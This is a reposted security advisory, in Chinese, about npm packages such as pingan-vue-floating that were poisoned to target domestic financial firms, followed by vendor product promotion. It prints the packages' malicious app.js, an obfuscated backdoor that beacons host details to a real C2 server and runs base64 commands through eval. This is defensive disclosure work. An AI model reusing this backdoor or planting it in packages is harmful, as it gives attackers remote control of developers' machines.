首起针对国内金融企业的开源组件投毒攻击事件

这篇具有很好参考价值的文章主要介绍了首起针对国内金融企业的开源组件投毒攻击事件。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

 简述

2023年8月9日,墨菲监控到用户名为 snugglejack_org (邮件地址:SnuggleBearrxx@hotmail.com)的用户发布到 NPM 仓库中的 ws-paso-jssdk 组件包具有发向 https://ql.rustdesk[.]net 的可疑流量,经过确认该组件包携带远控脚本,从攻击者可控的 C2 服务器接收并执行系统命令,该组件包于2023年8月10日7点 21 分从 NPM 仓库下架。

经过持续跟踪发现,该投毒者继续向 NPM 仓库继续发布了 pingan-vue-floating 等类似恶意组件包,投毒包的恶意 C2 地址改为了 62.234.32.226 ,此 IP 为以北京腾讯云提供,并且投毒包以 pingan、ynf 等命名,很大几率是针对国内厂商(例如中国*安),投毒者通过模拟目标企业内部私有源组件命名进行混淆,进而通过诱导用户企业内部用户下载投毒组件包实现对目标机器的远控入侵,这是目前公开发现的首起针对国内金融企业的开源组件投毒攻击事件。

截至2023年8月14日,投毒包仍可在NPM腾讯源进行下载(见图1),用户可通过 npm ls 判断是否下载了恶意组件,批量检测投毒检测可联系墨菲安全使用产品工具进行全网一键排查,最近正值大型攻防演练,建议大家认真排查。

首起针对国内金融企业的开源组件投毒攻击事件,墨菲安全实验室漏洞预警,软件供应链安全,金融,阿里云

图1: 腾讯云NPM组件下载地址 

投毒分析

以pingan-vue-floating-0.0.7组件为例,该组件包通过 pm2 创建守护线程,每隔 45 秒后向攻击者可控的恶意C2服务器发送请求维持心跳,进而接收并执行攻击者发送的系统命令:


//pingan-vue-floating-0.0.7/app.js

const key = (37532).toString(36).toLowerCase()+(27).toString(36).toLowerCase().split('').map(function(S){return String.fromCharCode(S.charCodeAt()+(-39))}).join('')+(1166).toString(36).toLowerCase()+(function(){var v=Array.prototype.slice.call(arguments),A=v.shift();return v.reverse().map(function(N,Q){return String.fromCharCode(N-A-10-Q)}).join('')})(43,107,106,169,150,111,106)+(914).toString(36).toLowerCase()+(function(){var k=Array.prototype.slice.call(arguments),D=k.shift();return k.reverse().map(function(r,I){return String.fromCharCode(r-D-8-I)}).join('')})(36,167,112)
const url = "http://62.234.32.226:8888"
const filename = path.join(os.tmpdir(), 'node_logs.txt');
const headersCnf = {
    headers: {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134'
    }
};
……
function heartbeat(){
    const requestData = {
        hostname: os.hostname(),
        uuid:machineIdSync({original: true}),
        os:os.platform(),
    };
    sendRequest(url+'/api/index',aesEncrypt(JSON.stringify(requestData)))
    const task = {
        uuid:machineIdSync({original: true}),
    }
    sendRequest(url+'/api/captcha',aesEncrypt(JSON.stringify(task))).then(result => {
        try{
            if (result !== undefined) {
                const data = JSON.parse(result);
                const decodedData = Buffer.from(data.code, 'base64').toString();
                eval(decodedData)
            }
        }catch (error){
        }
    });

}

function app(){
    const result = checkFile();
    if (result.exists) {
        return
    } else {
        createTmpFile();
        setInterval(heartbeat, 45000);
    }
}
app()

此次事件的攻击者投毒的所有组件列表

首起针对国内金融企业的开源组件投毒攻击事件,墨菲安全实验室漏洞预警,软件供应链安全,金融,阿里云Tip:请各单位自行排查!

排查工具及投毒情报

1. 墨菲安全提供产品可实时拦截针对开源组件的投毒

墨菲安全的私有源网关产品可对npm、pip、maven等中央仓库的投毒事件进行实时的检测和拦截,同时支持对高危漏洞实现基线管理,目前该产品已在蚂蚁、小米、中国电信、中国移动等数十家客户落地应用。

2. 墨菲安全提供实时的开源组件投毒情报预警可订阅

墨菲安全0day漏洞及投毒情报覆盖最新的0day、1day及投毒情报预警,所有情报经过严格的安全专家研判,保障企业获取的第一手的高质量漏洞及投毒情报,更有比CVE漏洞库多25+额外的详细分析字段,目前该产品已在蚂蚁、美团、中国电信等数十家客户落地应用。


申请演示&试用通道:

https://www.murphysec.com/enterprise文章来源地址https://www.toymoban.com/news/detail-660908.html

到了这里,关于首起针对国内金融企业的开源组件投毒攻击事件的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 低代码平台协同OA升级,促进金融企业信息化建设

    编者按:数字化办公是信息化时代每个企业不可避免的,OA系统是数字化办公的关键环节。如何与时俱进,保持企业的活力,增强企业综合竞争力?本文分析了企业OA系统为什么需要升级,并进一步指出如何实现升级。 :OA升级,低代码平台,老厂商,信息化建设 OA系统

    2024年02月16日
    浏览(47)
  • 企业年报API的应用:从金融投资到市场研究

    引言 在数字化时代,企业年报不再仅仅是一份财务报告,它们变成了宝贵的信息资源,可用于各种商业应用。企业年报API已经改变了金融投资和市场研究的方式,使得从中获取数据变得更加高效和灵活。本文将深入探讨企业年报API的应用,从金融投资到市场研究,展示了它们

    2024年02月07日
    浏览(46)
  • 大数据成为市场营销利器 ,促进金融贷款企业获客精准化

    随着大数据技术的不断普及,中国对尖端技术和云计算技术的投资大幅增加。大数据、云计算技术、物联网等一系列新一代信息技术也加速完善。 目前,大数据技术也非常成熟,大数据的应用领域也多种多样。大数据的重要方面“运营商大数据”已经被政府部门应用。公司可

    2024年02月10日
    浏览(39)
  • 运营商大数据获客:电销数据资源企业要实现精准获客金融贷款行业

    随着经济的快速发展,贷款行业的客户获取方式也从过去几年的被动获取客户发展到现在的主动获取客户。对于信贷经纪人来说,客户永远是最大的问题。尤其是现在这个行业竞争越来越激烈,如何高效地获得准确的客户是每个信贷经纪人都担心的问题。 目前传统的电销数据

    2024年02月06日
    浏览(37)
  • 金融大数据应用-企业信贷风险防控模型竞赛开始-中国建设银行数据集-作者开箱测评

    各位朋友,最新金融风控模型竞赛开始了!竞赛名称为金融大数据应用:企业信贷风险防控;组织单位:数字中国建设峰会组委会;中国建设银行提供模型竞赛数据集。 这次模型竞赛奖金很高,总奖金160万元,一等奖八万元。 赛题背景:   金融机构的数字化转型正在如火

    2023年04月10日
    浏览(46)
  • 独立三方数据源!数据宝国有大数据为金融机构及物流企业提供双向赋能

    引言:根据第四次经济普查数据,我国交通运输、仓储和邮政业法人单位近60万家,个体经营户数580多万个,物流相关市场主体超过600万。其中超过九成的法人单位属于中小微企业。他们是物流业发展的生力军,也是建设现代物流体系的重要基础,更是吸纳就业、改善民生的

    2024年01月19日
    浏览(39)
  • 国内企业出海首选的免费开源生产执行管理系统(MES)解决方案

    Odoo制造执行系统 (MES) 系统的创新型实时解决方案,可帮助您了解最新生产数据 准确获取各地生产设施的数据对于短期业务执行以及长期战略规划都极为重要。为此,Odoo 提供了基于条码扫描仪的传统界面,以及支持互动的创新型平板电脑应用。条码扫描仪可加快数据录入速

    2024年02月04日
    浏览(55)
  • 华为云 OpenTiny 跨端、跨框架企业级开源组件库项目落地实践直播即将开启!

    大家好,我是 Kagol,公众号:前端开源星球。 “你们这个产品怎么只能在电脑上适配呀?我想在手机上看都不行,太麻烦了!!” “你们这个产品看起来太简单了,我想要@@功能,你们这都不能实现吗?” “你们这个产品到底安全不安全呀,不会填一点信息然后全给我泄露

    2023年04月21日
    浏览(58)
  • 『EasyNotice』.NET开源消息通知组件——快速实现邮件/钉钉/飞书/企业微信告警通知

    📣读完这篇文章里你能收获到 了解博主开源的告警通知项目——EasyNotice 傻瓜式扩展方法直接使用 如何通过EasyNotice快速实现邮件/钉钉/飞书/企业微信的通知发送 感谢点赞+收藏,避免下次找不到~ 这是博主开源的一个基于.NET开源的消息通知组件,它包含了邮件、钉钉、飞书

    2023年04月08日
    浏览(50)
  • 针对国内外单片机的现况与发展研究综述

    针对国内外单片机的现况与发展研究综述 (太原理工大学,电气与动力工程学院) 摘 要 单片机是一种将微处理器、存储器、定时器、输入输出接口等集成在一块芯片上的微型计算机系统,具有体积小、功耗低、可靠性高、功能强等特点。单片机技术自从1971年诞生以来,已

    2024年02月03日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包